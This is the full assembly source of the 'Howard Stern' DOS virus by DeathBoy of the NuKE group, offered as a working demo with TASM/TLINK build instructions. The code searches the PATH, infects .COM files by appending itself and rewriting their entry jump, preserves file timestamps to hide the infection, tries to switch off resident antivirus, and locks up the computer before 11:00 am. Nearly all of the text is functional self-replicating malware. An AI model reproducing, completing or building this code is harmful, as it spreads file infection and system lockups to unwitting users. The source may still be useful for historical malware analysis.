; E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nuÿÿÿÿÿÿ ; uK E-ÿÿÿÿÿÿ ; E- 'HOWARD STERN ViRUS ASM SOURCE' Nuÿÿÿÿÿÿ ; Nu KEÿÿÿÿÿÿ ; KE ~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Nÿÿÿÿÿÿ ; -N by uKÿÿÿÿÿÿ ; uK DEATHBOY [NuKE] E-ÿÿÿÿÿÿ ; E- Nuÿÿÿÿÿÿ ; E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nuÿÿÿÿÿÿ ;ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ; [HOWARD].ASM -- The Howard Stern virus ; ; Written by DeathBoy[NuKE] ; ; Well, this ought to turn some heads... NOT... this is the source code for ; a New Virus... It displays ' I'm Not working until Howard Stern is Done ; @ 11:00 am. Bow down Before the King.' if the infected program is ran ; anytime before 11:00 am.===> Then lock up the Computer! ; It is a Non-Resident .COM infector that is 967 bytes long ; compiled...TO make this a Working DEMO...you will need TASM v2.0 ; or better... ( TASM /mx /m2 /q HOWARD.asm ) then ; ( TLINK /x /t HOWARD.obj ) ; the result should be a 1003 byte *.COM file infector that follows ; the DOS PATH= looking for victim files... ; it will only infect 2 files per execution ; of an infected file... ; ; CHEERS TO YOU HOWARD & Robin, I'm a Big FAN... Please ; COME TO ATLANTA, GA... ; Infinity ( 92.9 FM ) has the GreaseIdiot on & I'm ; going Crazy! ; ; Ps. I thought the Book was funny, #2 on the Best-seller's list in the ; area Stores ( & YOU ARE NOT ON DOWN HERE !!! ) ... Keep it up... ; ;=====> The intent of this VIRUS is not to destroy but to Annoy, ! ;Please do not give anyone this virus unless they want it, Knowingly ... ; You are responsible for your actions... ; ; BTW, there is a slight Bug in the Virus, put there on purpose ; It is an easy one to find & FIX... IF you can fix it, ; then :) You do not need to register. ; ; If not... then you do not need to know how. ; OR ; If you register however, I will take out the 'Beg/Buggy-Code' ; ; Get you AV idiots... FYA ESAD YMABFFW ; ; Long Live [NuKE], ARiSToTLE, NT, BO, & the latest [NuKE] ; member .. NoSFaRTu(sp) :) ; ;----------------------------CUT HERE----------------------------------- code segment byte public assume cs:code,ds:code,es:code,ss:code org 0100h main proc near push di ; Stupid Shit For Stupid push bp ; Programs push dx ; mov ax,05FEh ; Trash some mem. res. mov dx,0A6BAh ; software... not ax ; not dx ; int 16h ; golly wally, did that work? mov ax,05FDh ; mov dx,0A6BAh ; Maybe this time ??? mov bx,0000h ; not ax ; not dx ; int 16h ; pop dx ; pop bp ; pop di ; Ok. lets do this. db 0E9h,00h,00h ; Standard BS pointer start: call get_loc ; Like an Old trick get_loc: pop bp ; BP holds old IP sub bp,offset get_loc; Adjust for length of host lea si,[bp + buffer] ; SI points to original start mov di,0100h ; Push 0100h on to stack for xchg ax,bx ; beat the heat xchg bx,ax ; with clean code push di ; return to main program movsw ; Copy the first two bytes movsb ; Copy the third byte mov di,bp ; DI points to start of virus push sp ; doing the nasty with the pushf ; stupid coding. push bp ; Are you sure you know push di ; what you are doing?? push dx ; Doesn't look it?? call disvsafe ; Ahh, FiDO-DoRKS LOOK HERE pop dx ; Snoop-doogy dawg... pop di ; Yippie-Oh Yippie-heh. pop bp ; popf ; Freedom to do as I please. pop sp ; mov bp,sp ; BP points to stack sub sp,128 ; Allocate 128 bytes on stack mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address on stack mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer on stack xchg ax,bx ; Do Stuff for fun. xchg ax,bx ; Reiterate that int 021h ; R U still reading this?? ; WHy??? :^) call search_me ; Find and infect a file call search_me ; 2 files call get_hour cmp ax,000Bh ; Did the function return 11? jle go_next ; If less than or equal, do effec jmp not_yet ; Otherwise skip over it go_next: cmp ax,0006h ; Before 6:00am ?? jge strt00 ; Yep, Go do it jmp not_yet ; Nop, let get outta here strt00: push sp ; More BS... for the pushf ; Bytes... push bp ; push di ; It looks good in hex :) push dx ; Not! Show me some fucked ; code please!!! mov ah,09h ; BIOS display char. function mov dx, offset data01 ; whoop there it is... int 21h pop dx ; This is just for kicks pop di ; & giggles... pop bp ; Something tells popf ; me to do this... pop sp ; just for laughs lea si,[di + data00] ; SI points to shit call show_this mov cx,45h ; number of flashes flash: xor ax,ax ; Clear Register mov al,0FFh ; Load binary flags mov dx,060h ; Port number out 060h,al ; Toggle Keyboard lights dec cx ; lets do it one less time nop ; good for what ails you. jcxz getout ; ok, I'm thru. nop loop flash ; nah, I want to do it again getout: cli ; Clear the interrupt flag hlt ; HALT the computer jmp $ ; Why not?? not_yet: xor ax,ax ; Clear Register mov al,0FFh ; Load binary flags mov dx,060h ; Port number out 060h,al ; Toggle Keyboard lights dec cx ; lets do it one less time nop ; good for what ails you. jcxz com_end ; ok, I'm thru. loop not_yet ; nah, I want to do it again com_end: pop dx ; DX holds DTA address mov ah,01Ah ; DOS set DTA function int 021h mov sp,bp ; Deallocate local buffer xor ax,ax ; mov bx,ax ; mov cx,ax ; mov dx,ax ; DUMP out the registers mov si,ax ; mov di,ax ; mov bp,ax ; ret ; Return to original program main endp disvsafe proc near ; Well, Now this mov ax,05FEh ; is abusive. mov dx,0A6BAh ; not ax ; not dx ; int 16h ; Pretty Stupid, Huh? mov ax,05FDh ; Ha... You're looking mov dx,0A6BAh ; at it aren't you?? mov bx,0000h ; not ax ; not dx ; Yep, Lamest... int 16h ; ret ; disvsafe endp search_me proc near mov bx,di ; BX points to the virus push bp ; Save BP mov bp,sp ; BP points to local buffer sub sp,135 ; Allocate 135 bytes on stack mov byte ptr [bp - 135],'\' ; Start with a backslash mov ah,01h ; Clean code, Clean code... mov ah,047h ; DOS get current dir function xor dl,dl ; DL holds drive # (current) lea si,[bp - 134] ; SI points to 64-byte buffer int 021h call scan_path ; Start scanning scanpath_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsucces je found_none ; If so then we're done call found_sub ; Otherwise copy the subdirectory mov ax,cs ; AX holds the code segment mov ds,ax ; Set the data and extra mov es,ax ; segments to the code segment xor al,al ; Zero AL stosb ; NULL-terminate the directory xor ah,ah ; Clear register mov ah,03Bh ; DOS change directory function lea dx,[bp - 70] ; DX points to the directory int 021h lea dx,[bx + com_mask] ; DX points to '*.COM' push di mov di,bx call find_me ; Try to infect a .COM file mov bx,di pop di jnc found_none ; If successful the exit jmp short scanpath_loop ; Keep checking the PATH found_none: mov ah,03Bh ; DOS change directory function lea dx,[bp - 135] ; DX points to old directory int 021h cmp word ptr [bx + path_ad],0 ; Did we run out of direc jne try_again ; If not then exit stc ; Set the carry flag for failure try_again: mov sp,bp ; Restore old stack pointer pop bp ; Restore BP ret ; Return to caller com_mask db '*.COM',0 ; Mask for all .COM files search_me endp scan_path proc near mov es,word ptr cs:[002Ch] ; ES holds the enviroment s xor di,di ; DI holds the starting offset find_path: lea si,[bx + path_string] ; SI points to 'PATH=' lodsb ; Load the 'P' into AL xor cl, cl ; Clean those registers mov cx,08000h ; Check the first 32767 bytes repne scasb ; Search until the byte is found mov cx,4 ; Check the next four bytes check_next_4: lodsb ; Load the next letter of 'PATH=' scasb ; Compare it to the environment jne find_path ; If there not equal try again loop check_next_4 ; Otherwise keep checking mov word ptr [bx + path_ad],di ; Save the PATH add mov word ptr [bx + path_ad + 2],es ; Save the PATH's s ret ; Return to caller path_string db 'PATH=' ; The PATH string to search for path_ad dd ? ; Holds the PATH's address scan_path endp found_sub proc near lds si,dword ptr [bx + path_ad] ; DS:SI points to P lea di,[bp - 70] ; DI points to the work buffer push cs ; Transfer CS into ES for pop es ; byte transfer move_sub: lodsb ; Load the next byte into AL cmp al,';' ; Have we reached a separator? je moved_one ; If so we're done copying or al,al ; Are we finished with the PATH? je moved_last_one ; If so get out of here stosb ; Store the byte at ES:DI jmp short move_sub ; Keep transfering characters ; keep it up moved_last_one: mov si,0000h ; Zero SI to signal complet moved_one: mov word ptr es:[bx + path_ad],si ; Store SI in the pa ret ; Return to caller found_sub endp find_me proc near push bp ; Save BP mov ah,0FFh ; Clean code mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack push dx ; Save file mask mov ah,0FFh ; Clean code mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer on stack xchg ax,bx ; Lets do the Time xchg ax,bx ; warp again int 021h mov ah,0FFh ; Clean code just for fun mov ah,04Eh ; DOS find first file function mov cx,00100111b ; CX holds all file attributes pop dx ; Restore file mask find_a_file: int 021h jc found_out ; Exit if no files found call infect_file ; Infect the file! jnc found_out ; Exit if no error mov ah,0FFh ; Clean code mov ah,04Fh ; DOS find next file function jmp short find_a_file; Try finding another file found_out: mov sp,bp ; Restore old stack frame mov ah,0FFh ; Clean code mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to caller find_me endp ; Are you reading this ; nonsense? show_this proc near mov ah,0Eh ; BIOS display loop_this: lodsb ; Load next char. into AL or al,al ; Is the character a null? je show_ended ; Yep, exit int 010h ; BIOS video interrupt jmp short loop_this ; Do next character show_ended: ret ; Return to caller show_this endp data00 db ' I'm not working until Howard Stern is done @ 11:00 am db ' Bow down before the King ',13,12 db ' Smile ... [NuKE] loves you',13,10,13,10,07,13,0 data01 db ' I'm not working until Howard Stern is done @ 11:00 am infect_file proc near mov ah,0FFh ; Clean code, yeaah suuure mov ah,02Fh ; DOS get DTA address function int 021h mov si,bx ; SI points to the DTA mov byte ptr [di + set_carry],0 ; Assume we'll fail cmp word ptr [si + 01Ah],(65279 - (finish - start)) jbe we_be_good ; If it's small enough continue jmp infection_done ; Otherwise exit we_be_good: mov ax,03D00h ; DOS open file function, r/o lea dx,[si + 01Eh] ; DX points to file name int 021h xchg bx,ax ; BX holds file handle mov ah,03Fh ; DOS read from file function mov cx,3 ; CX holds bytes to read (3) lea dx,[di + buffer] ; DX points to buffer int 021h mov ah,0FFh ; Clean code xor ah,ah ; Clean the registers mov ah,0FFh ; Clean code again xor ah,ah ; Clean the registers mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h xchg dx,ax ; Faster than a PUSH AX mov ah,03Eh ; DOS close file function int 021h xchg dx,ax ; Faster than a POP AX sub ax,finish - start + 3 ; Adjust AX for a valid jum cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet je infection_done ; If equal then exit mov byte ptr [di + set_carry],1 ; Success -- the file add ax,finish - start ; Re-adjust to make the jum mov word ptr [di + new_jump + 1],ax ; Construct jump mov ax,0BCFEh ; DOS set file attrib. function xor cx,cx ; Clear all attributes lea dx,[si + 01Eh] ; DX points to victim's name not ax int 021h mov ax,0C2FDh ; DOS open file function, r/w not ax int 021h xchg bx,ax ; BX holds file handle mov ah,040h ; DOS write to file function mov cx,3 ; CX holds bytes to write (3) lea dx,[di + new_jump] ; DX points to the jump we made int 021h xor ah,ah ; Clear Registers xor ax,ax mov ax,0BDFDh ; DOS file seek function, EOF not ax cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h mov ah,69h mov ah,040h ; DOS write to file function mov cx,finish - start; CX holds virus length lea dx,[di + start] ; DX points to start of virus int 021h mov ah,69h xor ax,ax mov ax,0A8FEh ; DOS set file time function mov cx,[si + 016h] ; CX holds old file time mov dx,[si + 018h] ; DX holds old file date not ax int 021h mov ah,03Eh ; DOS close file function int 021h mov ax,0BCFEh ; DOS set file attrib. function xor ch,ch ; Clear CH for file attribute mov cl,[si + 015h] ; CX holds file's old attributes lea dx,[si + 01Eh] ; DX points to victim's name not ax int 021h infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if fa ret ; Return to caller set_carry db ? ; Set-carry-on-exit flag buffer db 090h,0CDh,020h ; Buffer to hold old three bytes new_jump db 0E9h,?,? ; New jump to virus infect_file endp get_hour proc near mov ah,02Ch ; DOS get time function int 021h mov al,ch ; Copy hour into AL cbw ; Sign-extend AL into AX ret ; Return to caller get_hour endp note db ' 1234567890!@#$%^&*()ascii ' db ' (c) Ba Ba Stupid... ' db ' Remember Studderin' John ' db ' Robin, I love You! ' db ' Long Live [NuKE] ' db 12h,13h,17h,19h db ' Georgia needs Howard Stern' finish label near code ends end main